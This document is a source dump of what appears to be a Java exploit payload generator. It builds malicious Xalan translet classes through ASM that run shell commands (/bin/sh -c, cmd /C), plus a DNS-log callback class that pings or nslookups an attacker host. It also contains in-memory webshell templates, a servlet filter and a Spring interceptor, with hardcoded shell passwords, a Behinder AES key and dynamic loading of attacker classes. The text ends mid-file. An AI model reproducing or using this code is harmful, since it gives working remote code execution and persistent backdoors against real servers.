WwwA6gDrAQAeamF2YS9sYW5nL0ludGVycnVwdGVkRXhjZXB0aW9uDADsAFsMAOgA7QwA7gDvDABoAGkBABNqYXZhL2lvL0lPRXhjZXB0aW9uAQAMamF2YS9uZXQvVVJMDABZAFgMAFoAaQwA8ADxAQAaamF2YS9uZXQvSHR0cFVSTENvbm5lY3Rpb24MAPIA8wwA9ADzAQAEUE9TVAwA9QBpAQAMQ29udGVudC1UeXBlAQAwYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkOyBjaGFyc2V0PVVURi04DAD2APcBABNqYXZhL2lvL1ByaW50V3JpdGVyAQAcamF2YS9pby9CdWZmZXJlZE91dHB1dFN0cmVhbQwA+AD5DABaAPoMAPsA/AwAbgBvDAD9AGkMAP4AWwEABXV0Zi04DABaAP8MAQAAWwEAE2phdmEvbGFuZy9FeGNlcHRpb24BAAABACBqYXZheC54bWwuYmluZC5EYXRhdHlwZUNvbnZlcnRlcgwBAQECAQAPamF2YS9sYW5nL0NsYXNzDAEDAQQHAQUMAQYA8wEAEGphdmEvbGFuZy9PYmplY3QMAQcBCAwBCQEKAQARcHJpbnRCYXNlNjRCaW5hcnkBAAJbQgwBCwEMBwENDAEOAQ8BABhqYXZhLnV0aWwuQmFzZTY0JEVuY29kZXIHARAMAREBEgcBEwwA7gEUDADuARUBAA5lbmNvZGVUb1N0cmluZwwBFgEMAQAKRXhlY3V0ZUNtZAEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBABFqYXZhL2xhbmcvUnVudGltZQEAE1tMamF2YS9sYW5nL1N0cmluZzsBABFqYXZhL2xhbmcvUHJvY2VzcwEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEABmFwcGVuZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmdCdWlsZGVyOwEACHRvU3RyaW5nAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAMamF2YS9pby9GaWxlAQAJc2VwYXJhdG9yAQAGZXF1YWxzAQAVKExqYXZhL2xhbmcvT2JqZWN0OylaAQAEZXhlYwEAKChbTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAFY2xvc2UBAAd3YWl0Rm9yAQADKClJAQAPcHJpbnRTdGFja1RyYWNlAQAVKExqYXZhL2xhbmcvT2JqZWN0OylWAQAHdmFsdWVPZgEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9TdHJpbmc7AQAOb3BlbkNvbm5lY3Rpb24BABooKUxqYXZhL25ldC9VUkxDb25uZWN0aW9uOwEACnNldERvSW5wdXQBAAQoWilWAQALc2V0RG9PdXRwdXQBABBzZXRSZXF1ZXN0TWV0aG9kAQASc2V0UmVxdWVzdFByb3BlcnR5AQAnKExqYXZhL2xhbmcvU3RyaW5nO0xqYXZhL2xhbmcvU3RyaW5nOylWAQAPZ2V0T3V0cHV0U3RyZWFtAQAYKClMamF2YS9pby9PdXRwdXRTdHJlYW07AQAZKExqYXZhL2lvL091dHB1dFN0cmVhbTspVgEACGdldEJ5dGVzAQAEKClbQgEABXdyaXRlAQAFZmx1c2gBACooTGphdmEvaW8vSW5wdXRTdHJlYW07TGphdmEvbGFuZy9TdHJpbmc7KVYBAApkaXNjb25uZWN0AQAHZm9yTmFtZQEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsBABZnZXREZWNsYXJlZENvbnN0cnVjdG9yAQAzKFtMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvQ29uc3RydWN0b3I7AQAdamF2YS9sYW5nL3JlZmxlY3QvQ29uc3RydWN0b3IBAA1z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"; 39 | ClassReader cr = null; 40 | cr = new ClassReader(Utils.Base64DecodeStr2bytes(WriteFileClassBase64)); 41 | ClassWriter cw = new ClassWriter(cr, ClassWriter.COMPUTE_MAXS); 42 | ASMChanger.ModifyAccessVisitor mv = new ASMChanger.ModifyAccessVisitor(ASM6,cw, MyDIYType.commandecho,"",uri,cmd); 43 | cr.accept(mv,ClassReader.SKIP_FRAMES); 44 | bytes = cw.toByteArray(); 45 | 46 | } 47 | 48 | public static void fileOutputStreamMethod(String filepath, byte[] content) throws IOException { 49 | try { 50 | FileOutputStream fileOutputStream = new FileOutputStream(filepath); 51 | byte[] bytes = content; 52 | fileOutputStream.write(bytes); 53 | }catch (Exception e){ 54 | e.printStackTrace(); 55 | } 56 | } 57 | } 58 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Templates/CommandTemplate.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Templates; 2 | 3 | import com.achuna33.Utils.Cache; 4 | import com.achuna33.Utils.Utils; 5 | import org.objectweb.asm.*; 6 | import static org.objectweb.asm.Opcodes.*; 7 | 8 | public class CommandTemplate implements Template{ 9 | private String className; 10 | private byte[] bytes; 11 | private String cmd; 12 | 13 | public CommandTemplate(String cmd){ 14 | this.cmd = cmd; 15 | this.className = "Exploit" + Utils.getRandomString(4); 16 | 17 | generate(); 18 | } 19 | 20 | public CommandTemplate(String cmd, String className){ 21 | this.cmd = cmd; 22 | this.className = className; 23 | 24 | generate(); 25 | } 26 | 27 | public void cache(){ 28 | Cache.set(className, bytes); 29 | } 30 | 31 | public String getClassName(){ 32 | return className; 33 | } 34 | 35 | public byte[] getBytes(){ 36 | return bytes; 37 | } 38 | 39 | public void generate(){ 40 | ClassWriter cw = new ClassWriter(0); 41 | FieldVisitor fv; 42 | MethodVisitor mv; 43 | AnnotationVisitor av0; 44 | 45 | cw.visit(V1_6, ACC_PUBLIC + ACC_SUPER, className, null, "com/sun/org/apache/xalan/internal/xsltc/runtime/AbstractTranslet", null); 46 | 47 | { 48 | fv = cw.visitField(ACC_PRIVATE + ACC_STATIC, "cmd", "Ljava/lang/String;", null, null); 49 | fv.visitEnd(); 50 | } 51 | { 52 | mv = cw.visitMethod(ACC_PUBLIC, "", "()V", null, null); 53 | mv.visitCode(); 54 | Label l0 = new Label(); 55 | Label l1 = new Label(); 56 | Label l2 = new Label(); 57 | mv.visitTryCatchBlock(l0, l1, l2, "java/io/IOException"); 58 | mv.visitVarInsn(ALOAD, 0); 59 | mv.visitMethodInsn(INVOKESPECIAL, "com/sun/org/apache/xalan/internal/xsltc/runtime/AbstractTranslet", "", "()V", false); 60 | mv.visitFieldInsn(GETSTATIC, "java/io/File", "separator", "Ljava/lang/String;"); 61 | mv.visitLdcInsn("/"); 62 | mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/String", "equals", "(Ljava/lang/Object;)Z", false); 63 | Label l3 = new Label(); 64 | mv.visitJumpInsn(IFEQ, l3); 65 | //--------------------------------有所改动 66 | mv.visitInsn(ICONST_3); 67 | mv.visitTypeInsn(ANEWARRAY, "java/lang/String"); 68 | mv.visitInsn(DUP); 69 | mv.visitInsn(ICONST_0); 70 | mv.visitLdcInsn("/bin/sh"); 71 | mv.visitInsn(AASTORE); 72 | mv.visitInsn(DUP); 73 | mv.visitInsn(ICONST_1); 74 | mv.visitLdcInsn("-c"); 75 | mv.visitInsn(AASTORE); 76 | mv.visitInsn(DUP); 77 | mv.visitInsn(ICONST_2); 78 | mv.visitFieldInsn(GETSTATIC, className, "cmd", "Ljava/lang/String;"); 79 | mv.visitInsn(AASTORE); 80 | mv.visitVarInsn(ASTORE, 1); 81 | mv.visitJumpInsn(GOTO, l0); 82 | mv.visitLabel(l3); 83 | mv.visitFrame(Opcodes.F_FULL, 1, new Object[] {className}, 0, new Object[] {}); 84 | mv.visitInsn(ICONST_3); 85 | mv.visitTypeInsn(ANEWARRAY, "java/lang/String"); 86 | mv.visitInsn(DUP); 87 | mv.visitInsn(ICONST_0); 88 | mv.visitLdcInsn("cmd"); 89 | mv.visitInsn(AASTORE); 90 | mv.visitInsn(DUP); 91 | mv.visitInsn(ICONST_1); 92 | mv.visitLdcInsn("/C"); 93 | mv.visitInsn(AASTORE); 94 | mv.visitInsn(DUP); 95 | mv.visitInsn(ICONST_2); 96 | mv.visitFieldInsn(GETSTATIC, className, "cmd", "Ljava/lang/String;"); 97 | mv.visitInsn(AASTORE); 98 | mv.visitVarInsn(ASTORE, 1); 99 | mv.visitLabel(l0); 100 | mv.visitFrame(Opcodes.F_APPEND,1, new Object[] {"[Ljava/lang/String;"}, 0, null); 101 | mv.visitMethodInsn(INVOKESTATIC, "java/lang/Runtime", "getRuntime", "()Ljava/lang/Runtime;", false); 102 | mv.visitVarInsn(ALOAD, 1); 103 | mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/Runtime", "exec", "([Ljava/lang/String;)Ljava/lang/Process;", false); 104 | mv.visitInsn(POP); 105 | mv.visitLabel(l1); 106 | Label l4 = new Label(); 107 | mv.visitJumpInsn(GOTO, l4); 108 | mv.visitLabel(l2); 109 | mv.visitFrame(Opcodes.F_SAME1, 0, null, 1, new Object[] {"java/io/IOException"}); 110 | mv.visitVarInsn(ASTORE, 2); 111 | mv.visitVarInsn(ALOAD, 2); 112 | mv.visitMethodInsn(INVOKEVIRTUAL, "java/io/IOException", "printStackTrace", "()V", false); 113 | mv.visitLabel(l4); 114 | mv.visitFrame(Opcodes.F_SAME, 0, null, 0, null); 115 | mv.visitInsn(RETURN); 116 | mv.visitMaxs(4, 3); 117 | mv.visitEnd(); 118 | } 119 | //-------------------------------无改动 120 | { 121 | mv = cw.visitMethod(ACC_PUBLIC, "transform", "(Lcom/sun/org/apache/xalan/internal/xsltc/DOM;[Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;)V", null, new String[] { "com/sun/org/apache/xalan/internal/xsltc/TransletException" }); 122 | mv.visitCode(); 123 | mv.visitInsn(RETURN); 124 | mv.visitMaxs(0, 3); 125 | mv.visitEnd(); 126 | } 127 | //--------------------------------无改动 128 | { 129 | mv = cw.visitMethod(ACC_PUBLIC, "transform", "(Lcom/sun/org/apache/xalan/internal/xsltc/DOM;Lcom/sun/org/apache/xml/internal/dtm/DTMAxisIterator;Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;)V", null, new String[] { "com/sun/org/apache/xalan/internal/xsltc/TransletException" }); 130 | mv.visitCode(); 131 | mv.visitInsn(RETURN); 132 | mv.visitMaxs(0, 4); 133 | mv.visitEnd(); 134 | } 135 | //---------------------------------------- 136 | { 137 | mv = cw.visitMethod(ACC_STATIC, "", "()V", null, null); 138 | mv.visitCode(); 139 | mv.visitLdcInsn(cmd);//此处 140 | mv.visitFieldInsn(PUTSTATIC, className, "cmd", "Ljava/lang/String;");// 这里可能改动 点 141 | mv.visitInsn(RETURN); 142 | mv.visitMaxs(1, 0); 143 | mv.visitEnd(); 144 | } 145 | cw.visitEnd(); 146 | bytes = cw.toByteArray(); 147 | } 148 | } 149 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Templates/DnslogTemplate.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Templates; 2 | 3 | import com.achuna33.Utils.Cache; 4 | import com.achuna33.Utils.Utils; 5 | import org.objectweb.asm.*; 6 | 7 | import static org.objectweb.asm.Opcodes.*; 8 | 9 | public class DnslogTemplate implements Template { 10 | private String className; 11 | private byte[] bytes; 12 | private String dnslog; 13 | 14 | 15 | public DnslogTemplate(String dnslog){ 16 | this.dnslog = dnslog; 17 | this.className = "Exploit" + Utils.getRandomString(4); 18 | 19 | generate(); 20 | } 21 | 22 | public DnslogTemplate(String dnslog, String className){ 23 | this.dnslog = dnslog; 24 | this.className = className; 25 | 26 | generate(); 27 | } 28 | 29 | public void cache(){ 30 | Cache.set(className, bytes); 31 | } 32 | 33 | public String getClassName(){ 34 | return className; 35 | } 36 | 37 | public byte[] getBytes(){ 38 | return bytes; 39 | } 40 | 41 | public void generate(){ 42 | ClassWriter cw = new ClassWriter(0); 43 | FieldVisitor fv; 44 | MethodVisitor mv; 45 | AnnotationVisitor av0; 46 | 47 | cw.visit(V1_6, ACC_PUBLIC + ACC_SUPER, className, null, "com/sun/org/apache/xalan/internal/xsltc/runtime/AbstractTranslet", null); 48 | 49 | { 50 | fv = cw.visitField(ACC_PRIVATE + ACC_STATIC, "dnslog", "Ljava/lang/String;", null, null); 51 | fv.visitEnd(); 52 | } 53 | { 54 | mv = cw.visitMethod(ACC_PUBLIC, "", "()V", null, null); 55 | mv.visitCode(); 56 | Label l0 = new Label(); 57 | Label l1 = new Label(); 58 | Label l2 = new Label(); 59 | mv.visitTryCatchBlock(l0, l1, l2, "java/io/IOException"); 60 | mv.visitVarInsn(ALOAD, 0); 61 | mv.visitMethodInsn(INVOKESPECIAL, "com/sun/org/apache/xalan/internal/xsltc/runtime/AbstractTranslet", "", "()V", false); 62 | mv.visitFieldInsn(GETSTATIC, "java/io/File", "separator", "Ljava/lang/String;"); 63 | mv.visitLdcInsn("/"); 64 | mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/String", "equals", "(Ljava/lang/Object;)Z", false); 65 | Label l3 = new Label(); 66 | mv.visitJumpInsn(IFEQ, l3); 67 | //--------------------------------有所改动 68 | mv.visitTypeInsn(NEW, "java/lang/StringBuilder"); 69 | mv.visitInsn(DUP); 70 | mv.visitMethodInsn(INVOKESPECIAL, "java/lang/StringBuilder", "", "()V", false); 71 | mv.visitLdcInsn("ping -c 1 "); 72 | mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/StringBuilder", "append", "(Ljava/lang/String;)Ljava/lang/StringBuilder;", false); 73 | mv.visitFieldInsn(GETSTATIC, className, "dnslog", "Ljava/lang/String;"); 74 | mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/StringBuilder", "append", "(Ljava/lang/String;)Ljava/lang/StringBuilder;", false); 75 | mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/StringBuilder", "toString", "()Ljava/lang/String;", false); 76 | mv.visitVarInsn(ASTORE, 1); 77 | mv.visitJumpInsn(GOTO, l0); 78 | mv.visitLabel(l3); 79 | mv.visitFrame(Opcodes.F_FULL, 1, new Object[] {className}, 0, new Object[] {}); 80 | mv.visitTypeInsn(NEW, "java/lang/StringBuilder"); 81 | mv.visitInsn(DUP); 82 | mv.visitMethodInsn(INVOKESPECIAL, "java/lang/StringBuilder", "", "()V", false); 83 | mv.visitLdcInsn("nslookup "); 84 | mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/StringBuilder", "append", "(Ljava/lang/String;)Ljava/lang/StringBuilder;", false); 85 | mv.visitFieldInsn(GETSTATIC, className, "dnslog", "Ljava/lang/String;"); 86 | mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/StringBuilder", "append", "(Ljava/lang/String;)Ljava/lang/StringBuilder;", false); 87 | mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/StringBuilder", "toString", "()Ljava/lang/String;", false); 88 | mv.visitVarInsn(ASTORE, 1); 89 | mv.visitLabel(l0); 90 | mv.visitFrame(Opcodes.F_APPEND,1, new Object[] {"java/lang/String"}, 0, null); 91 | mv.visitMethodInsn(INVOKESTATIC, "java/lang/Runtime", "getRuntime", "()Ljava/lang/Runtime;", false); 92 | mv.visitVarInsn(ALOAD, 1); 93 | mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/Runtime", "exec", "(Ljava/lang/String;)Ljava/lang/Process;", false); 94 | mv.visitInsn(POP); 95 | mv.visitLabel(l1); 96 | Label l4 = new Label(); 97 | mv.visitJumpInsn(GOTO, l4); 98 | mv.visitLabel(l2); 99 | mv.visitFrame(Opcodes.F_SAME1, 0, null, 1, new Object[] {"java/io/IOException"}); 100 | mv.visitVarInsn(ASTORE, 2); 101 | mv.visitVarInsn(ALOAD, 2); 102 | mv.visitMethodInsn(INVOKEVIRTUAL, "java/io/IOException", "printStackTrace", "()V", false); 103 | mv.visitLabel(l4); 104 | mv.visitFrame(Opcodes.F_SAME, 0, null, 0, null); 105 | mv.visitInsn(RETURN); 106 | mv.visitMaxs(2, 3); 107 | mv.visitEnd(); 108 | } 109 | //--------------------无改动 110 | { 111 | mv = cw.visitMethod(ACC_PUBLIC, "transform", "(Lcom/sun/org/apache/xalan/internal/xsltc/DOM;[Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;)V", null, new String[] { "com/sun/org/apache/xalan/internal/xsltc/TransletException" }); 112 | mv.visitCode(); 113 | mv.visitInsn(RETURN); 114 | mv.visitMaxs(0, 3); 115 | mv.visitEnd(); 116 | } 117 | //---------------------------无改动 118 | { 119 | mv = cw.visitMethod(ACC_PUBLIC, "transform", "(Lcom/sun/org/apache/xalan/internal/xsltc/DOM;Lcom/sun/org/apache/xml/internal/dtm/DTMAxisIterator;Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;)V", null, new String[] { "com/sun/org/apache/xalan/internal/xsltc/TransletException" }); 120 | mv.visitCode(); 121 | mv.visitInsn(RETURN); 122 | mv.visitMaxs(0, 4); 123 | mv.visitEnd(); 124 | } 125 | //------------------------ 126 | { 127 | mv = cw.visitMethod(ACC_STATIC, "", "()V", null, null); 128 | mv.visitCode(); 129 | mv.visitLdcInsn(dnslog);// 此处 130 | mv.visitFieldInsn(PUTSTATIC, className, "dnslog", "Ljava/lang/String;"); 131 | mv.visitInsn(RETURN); 132 | mv.visitMaxs(1, 0); 133 | mv.visitEnd(); 134 | } 135 | cw.visitEnd(); 136 | bytes = cw.toByteArray(); 137 | } 138 | } 139 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Templates/DynamicFilterTemplate.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Templates; 2 | 3 | import sun.misc.BASE64Decoder; 4 | import javax.crypto.Cipher; 5 | import javax.crypto.spec.SecretKeySpec; 6 | import javax.servlet.*; 7 | import javax.servlet.http.HttpServletRequest; 8 | import java.io.File; 9 | import java.io.IOException; 10 | import java.lang.reflect.InvocationTargetException; 11 | import java.lang.reflect.Method; 12 | import java.util.Scanner; 13 | 14 | public class DynamicFilterTemplate implements Filter { 15 | 16 | private Class myClassLoaderClazz; 17 | private String basicCmdShellPwd = "hack"; 18 | private String behinderShellHeader = "X-Options-Ai"; 19 | private String behinderShellPwd = "e45e329feb5d925b"; // rebeyond 20 | 21 | public DynamicFilterTemplate() { 22 | super(); 23 | initialize(); 24 | } 25 | 26 | @Override 27 | public void init(FilterConfig filterConfig) throws ServletException { 28 | 29 | } 30 | 31 | @Override 32 | public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException { 33 | System.out.println("[+] Dynamic Filter says hello"); 34 | 35 | if(servletRequest.getParameter("type") != null && servletRequest.getParameter("type").equals("basic")){ 36 | //basic cmd shell 37 | String cmd = servletRequest.getParameter(basicCmdShellPwd); 38 | if(cmd != null && !cmd.isEmpty()){ 39 | String[] cmds = null; 40 | if(File.separator.equals("/")){ 41 | cmds = new String[]{"/bin/sh", "-c", cmd}; 42 | }else{ 43 | cmds = new String[]{"cmd", "/C", cmd}; 44 | } 45 | String result = new Scanner(Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next(); 46 | servletResponse.getWriter().println(result); 47 | } 48 | }else if(((HttpServletRequest)servletRequest).getHeader(behinderShellHeader) != null){ 49 | //behind3 shell 50 | try{ 51 | if (((HttpServletRequest)servletRequest).getMethod().equals("POST")){ 52 | String k = behinderShellPwd; 53 | ((HttpServletRequest)servletRequest).getSession().setAttribute("u",k); 54 | Cipher cipher = Cipher.getInstance("AES"); 55 | cipher.init(2, new SecretKeySpec((((HttpServletRequest)servletRequest).getSession().getAttribute("u") + "").getBytes(), "AES")); 56 | byte[] evilClassBytes = cipher.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(servletRequest.getReader().readLine())); 57 | Class evilClass = (Class) myClassLoaderClazz.getDeclaredMethod("defineClass", byte[].class, ClassLoader.class).invoke(null, evilClassBytes, Thread.currentThread().getContextClassLoader()); 58 | Object evilObject = evilClass.newInstance(); 59 | Method targetMethod = evilClass.getDeclaredMethod("equals", new Class[]{ServletRequest.class, ServletResponse.class}); 60 | targetMethod.invoke(evilObject, new Object[]{servletRequest, servletResponse}); 61 | } 62 | }catch(Exception e){ 63 | e.printStackTrace(); 64 | } 65 | }else{ 66 | filterChain.doFilter(servletRequest, servletResponse); 67 | } 68 | } 69 | 70 | @Override 71 | public void destroy() { 72 | 73 | } 74 | 75 | private void initialize() { 76 | try{ 77 | ClassLoader classLoader = Thread.currentThread().getContextClassLoader(); 78 | try{ 79 | this.myClassLoaderClazz = classLoader.loadClass("com.feihong.ldap.template.MyClassLoader"); 80 | } catch (ClassNotFoundException e) { 81 | String code = "yv66vgAAADIAGwoABQAWBwAXCgACABYKAAIAGAcAGQEABjxpbml0PgEAGihMamF2YS9sYW5nL0NsYXNzTG9hZGVyOylWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAClMY29tL2ZlaWhvbmcvbGRhcC90ZW1wbGF0ZS9NeUNsYXNzTG9hZGVyOwEAAWMBABdMamF2YS9sYW5nL0NsYXNzTG9hZGVyOwEAC2RlZmluZUNsYXNzAQAsKFtCTGphdmEvbGFuZy9DbGFzc0xvYWRlcjspTGphdmEvbGFuZy9DbGFzczsBAAVieXRlcwEAAltCAQALY2xhc3NMb2FkZXIBAApTb3VyY2VGaWxlAQASTXlDbGFzc0xvYWRlci5qYXZhDAAGAAcBACdjb20vZmVpaG9uZy9sZGFwL3RlbXBsYXRlL015Q2xhc3NMb2FkZXIMAA8AGgEAFWphdmEvbGFuZy9DbGFzc0xvYWRlcgEAFyhbQklJKUxqYXZhL2xhbmcvQ2xhc3M7ACEAAgAFAAAAAAACAAAABgAHAAEACAAAADoAAgACAAAABiortwABsQAAAAIACQAAAAYAAQAAAAQACgAAABYAAgAAAAYACwAMAAAAAAAGAA0ADgABAAkADwAQAAEACAAAAEQABAACAAAAELsAAlkrtwADKgMqvrYABLAAAAACAAkAAAAGAAEAAAAIAAoAAAAWAAIAAAAQABEAEgAAAAAAEAATAA4AAQABABQAAAACABU="; 82 | byte[] bytes = new BASE64Decoder().decodeBuffer(code); 83 | Method method = null; 84 | try { 85 | method = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); 86 | method.setAccessible(true); 87 | this.myClassLoaderClazz = (Class) method.invoke(classLoader, bytes, 0, bytes.length); 88 | } catch (NoSuchMethodException ex) { 89 | ex.printStackTrace(); 90 | } 91 | } 92 | } catch (IllegalAccessException e) { 93 | e.printStackTrace(); 94 | } catch (IOException e) { 95 | e.printStackTrace(); 96 | } catch (InvocationTargetException e) { 97 | e.printStackTrace(); 98 | } 99 | } 100 | } 101 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Templates/DynamicInterceptorTemplate.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Templates; 2 | 3 | import org.springframework.stereotype.Controller; 4 | import org.springframework.web.servlet.handler.HandlerInterceptorAdapter; 5 | import sun.misc.BASE64Decoder; 6 | import javax.crypto.Cipher; 7 | import javax.crypto.spec.SecretKeySpec; 8 | import javax.servlet.ServletRequest; 9 | import javax.servlet.ServletResponse; 10 | import javax.servlet.http.HttpServletRequest; 11 | import javax.servlet.http.HttpServletResponse; 12 | import java.io.File; 13 | import java.io.IOException; 14 | import java.lang.reflect.InvocationTargetException; 15 | import java.lang.reflect.Method; 16 | import java.util.Scanner; 17 | 18 | @Controller 19 | public class DynamicInterceptorTemplate extends HandlerInterceptorAdapter { 20 | 21 | private Class myClassLoaderClazz; 22 | private String basicCmdShellPwd = "rebeyond"; 23 | private String behinderShellHeader = "X-Options-Ai"; 24 | private String behinderShellPwd = "e45e329feb5d925b"; // rebeyond 25 | 26 | public DynamicInterceptorTemplate() { 27 | initialize(); 28 | } 29 | 30 | @Override 31 | public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception { 32 | System.out.println("[+] Dynamic Interceptor says hello"); 33 | 34 | if(request.getParameter("type") != null && request.getParameter("type").equals("basic")){ 35 | //basic cmd shell 36 | String cmd = request.getParameter(basicCmdShellPwd); 37 | if(cmd != null && !cmd.isEmpty()){ 38 | String[] cmds = null; 39 | if(File.separator.equals("/")){ 40 | cmds = new String[]{"/bin/sh", "-c", cmd}; 41 | }else{ 42 | cmds = new String[]{"cmd", "/C", cmd}; 43 | } 44 | String result = new Scanner(Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next(); 45 | response.getWriter().println(result); 46 | 47 | return false; 48 | } 49 | }else if(request.getHeader(behinderShellHeader) != null){ 50 | //behind3 shell 51 | try{ 52 | if 